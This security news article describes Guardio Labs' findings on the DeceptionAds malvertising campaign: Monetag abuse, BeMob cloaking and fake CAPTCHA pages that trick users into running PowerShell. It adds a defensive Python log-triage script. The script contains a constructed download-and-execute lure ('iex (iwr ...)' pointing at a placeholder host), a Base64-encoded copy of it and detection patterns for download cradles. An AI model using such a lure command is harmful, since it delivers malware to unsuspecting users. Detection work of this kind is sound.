DeceptionAds: The Malvertising Campaign Weaponizing Ad Networks

Cybersecurity researchers at Guardio Labs have uncovered a large-scale malvertising campaign, dubbed DeceptionAds, that abuses legitimate ad networks to deliver information stealers and remote access trojans (RATs). Serving over 1 million ad impressions a day and claiming thousands of victims daily, the campaign shows how an ad network can be weaponized to compromise users' accounts and financial assets.

The Core Mechanisms of DeceptionAds

At the heart of the campaign is the Monetag ad network, where the threat actors register as publishers (website owners) and push the resulting traffic through a Traffic Distribution System (TDS), a redirector that profiles each visitor and decides where to send them. Cloaking inside the TDS shows harmless content to security scanners and ad-network reviewers, while real users are redirected to fake CAPTCHA verification pages. Those pages place a Base64-encoded PowerShell command on the visitor's clipboard and instruct them to paste and run it (via the Windows Run dialog) to "prove they are human"; the command fetches and executes the next stage, ultimately deploying malware such as the Lumma information stealer.
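The fake-CAPTCHA step leaves a distinctive trace on the endpoint: a PowerShell process with an encoded command line, launched from the Run dialog, whose decoded payload is a download cradle. The script below is an added example (not Guardio Labs' code and not anything taken from the campaign) that triages process-creation log lines for that pattern. The "key=value | key=value" log format, the field names, the indicator weights and the alert threshold are all assumptions made for this example; the sample lines and the lure payload are constructed here, and the payload points at a reserved `.invalid` domain that never resolves.

```python
"""Triage process-creation log lines for the fake-CAPTCHA (ClickFix) pattern.

Added example, not Guardio Labs' code. It decodes the -EncodedCommand
argument (Base64 of UTF-16LE text), then scores indicators typical of the
lure: hidden window, execution-policy bypass, a download cradle piped into
Invoke-Expression, a "not a robot" comment left inside the command, and
explorer.exe as the parent process (what a Win+R launch looks like).
Log format, field names, weights and threshold are assumptions.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import Optional

ALERT_THRESHOLD = 6  # assumed; tune against your own telemetry

# Matches -e / -ec / -enc / -EncodedCommand and captures the Base64 blob.
ENC_RE = re.compile(
    r"(?i)(?:^|\s)[-/]e(?:c|n|nc|ncoded|ncodedc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)"
)

# (name, pattern, weight); run over the raw command line plus decoded payload.
INDICATORS = [
    ("hidden_window", re.compile(r"(?i)-w(?:indowstyle)?\s+(?:h(?:idden)?|1)\b"), 2),
    ("policy_bypass", re.compile(r"(?i)-e(?:p|x\w*)\s+(?:bypass|unrestricted)\b"), 2),
    ("no_profile", re.compile(r"(?i)-nop(?:rofile)?\b"), 1),
    ("download_cradle", re.compile(r"(?i)\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|"
                                   r"downloadstring|downloadfile|curl|wget|mshta)\b"), 3),
    ("inline_eval", re.compile(r"(?i)\b(?:iex|invoke-expression)\b"), 2),
    ("captcha_lure", re.compile(r"(?i)not a robot|captcha|verification"), 3),
]

# Constructed lure payload (hypothetical host on a reserved .invalid domain).
_LURE = ("iex (iwr 'http://captcha-check.example.invalid/verify.txt' -UseBasicParsing)"
         "  # 'I am not a robot - reCAPTCHA Verification'")
_LURE_B64 = base64.b64encode(_LURE.encode("utf-16-le")).decode("ascii")

# Constructed sample lines, loosely modelled on a Sysmon Event ID 1 export.
SAMPLE_LOG = [
    "ts=2024-12-05T10:01:22Z | Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    " | ParentImage=C:\\Windows\\explorer.exe"
    f" | CommandLine=powershell.exe -w hidden -ep bypass -nop -e {_LURE_B64}",
    "ts=2024-12-05T10:02:03Z | Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    " | ParentImage=C:\\Windows\\System32\\cmd.exe"
    " | CommandLine=powershell.exe -NoProfile -Command \"Get-Service -Name Spooler\"",
    "ts=2024-12-05T10:03:40Z | Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    " | ParentImage=C:\\Windows\\explorer.exe"
    " | CommandLine=powershell.exe -Command Get-Date",
]


def parse_line(line: str) -> dict:
    """Split one 'k=v | k=v' line into a dict (split on first '=' only: Base64 uses '=')."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand text, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    line_no: int
    score: int = 0
    indicators: list = field(default_factory=list)
    decoded: Optional[str] = None

    @property
    def verdict(self) -> str:
        return "ALERT: fake-CAPTCHA/ClickFix pattern" if self.score >= ALERT_THRESHOLD else "low"


def score_event(line_no: int, ev: dict) -> Finding:
    f = Finding(line_no)
    cmd = ev.get("CommandLine", "")
    f.decoded = decode_encoded_command(cmd)
    if f.decoded is not None:
        f.indicators.append("encoded_command")
        f.score += 2
    # A command pasted into Win+R runs as a child of explorer.exe; admin tooling
    # normally arrives via cmd.exe, a terminal or a management agent instead.
    if (_basename(ev.get("ParentImage", "")) == "explorer.exe"
            and _basename(ev.get("Image", "")) in ("powershell.exe", "pwsh.exe")):
        f.indicators.append("parent_explorer")
        f.score += 2
    haystack = cmd + "\n" + (f.decoded or "")
    for name, pat, weight in INDICATORS:
        if pat.search(haystack):
            f.indicators.append(name)
            f.score += weight
    return f


def triage(lines) -> list:
    """Score every line; returns one Finding per input line, in order."""
    return [score_event(i, parse_line(line)) for i, line in enumerate(lines, 1)]


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"line {f.line_no}: score={f.score:2d} {f.verdict} {f.indicators}")
        if f.decoded:
            print("    decoded:", f.decoded)
```

The third sample line matters as much as the first: a user who opens Run and types `powershell -Command Get-Date` also produces an explorer.exe-parented PowerShell process, so the parent alone is a weak signal. The alert fires only when the launch context, the obfuscation flags and the decoded download-and-execute payload line up, which is exactly the combination the fake-CAPTCHA page induces.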

According to Nati Tal, head of Guardio Labs:

Entirely reliant on a single ad network for propagation, this campaign showcases the core mechanisms of malvertising—delivering over 1 million daily 'ad impressions' and causing thousands of daily victims to lose their accounts and money.

A Fragmented Chain of Accountability

The attack exploits legitimate services in multiple ways:

  • Monetag: the ad network through which the attackers, registered as publishers, push traffic into the malicious redirect chain.
  • BeMob: an ad-tracking service abused for cloaking; traffic is routed through benign-looking BeMob URLs, which send scanners and reviewers to harmless content and real visitors on to the fake CAPTCHA pages.
  • Hosting platforms: the fake CAPTCHA pages themselves are hosted on services such as Oracle Cloud, Scaleway, and Cloudflare R2.

Because each provider sees only its own link in the chain, no single party is positioned to recognise the abuse, and accountability is fragmented across all of them.

Beyond a Single Threat Actor

The campaign has expanded beyond a single threat actor, with reports of multiple unattributed clusters using similar techniques to deliver advanced malware, including:

  • Remote Access Trojans (RATs)
  • Post-exploitation frameworks like Brute Ratel C4

This underscores how quickly the fake-CAPTCHA social-engineering lure is being adopted across the cybercriminal ecosystem.

Steps Taken and the Road Ahead

Following responsible disclosure, Monetag removed over 200 malicious accounts in late November 2024, and BeMob deactivated the accounts used for cloaking. The takedown held only briefly: the campaign was active again by December 5, 2024, showing how resilient these operations are.

Tal emphasized the need for robust content moderation and strict account validation processes, saying:

From deceptive publisher sites offering pirated or clickbait content to complex redirect chains and cloaking techniques, this campaign underscores how ad networks, designed for legitimate purposes, can be weaponized for malicious activities.

What Can Be Done?

To combat malvertising campaigns like DeceptionAds, the following measures are crucial:

  1. Enhanced Content Moderation: Ad networks must improve detection of malicious publisher registrations and of redirect chains whose destination changes depending on who is visiting (cloaking).
  2. Stricter Validation: Implement multi-layered account verification so that removed accounts cannot simply be re-created.
  3. End-User Awareness: No legitimate CAPTCHA ever asks you to open the Run dialog or a terminal and paste a command; any "verification" that does is a lure and should be closed, not followed.
  4. Collaboration: Ad networks, hosting providers, and cybersecurity firms need to share indicators and act together, since each one alone sees only part of the chain.

Conclusion

The DeceptionAds campaign is a sobering reminder of how legitimate tools, like ad networks, can be weaponized in the wrong hands. By exploiting fragmented accountability and leveraging sophisticated cloaking techniques, cybercriminals continue to evolve their tactics.

As malvertising campaigns grow in scale and complexity, organizations and ad platforms must prioritize security to ensure their services remain tools for legitimate use rather than conduits for malicious activities.

More articles by Digital Forensics Research and Service Center (DFRSC)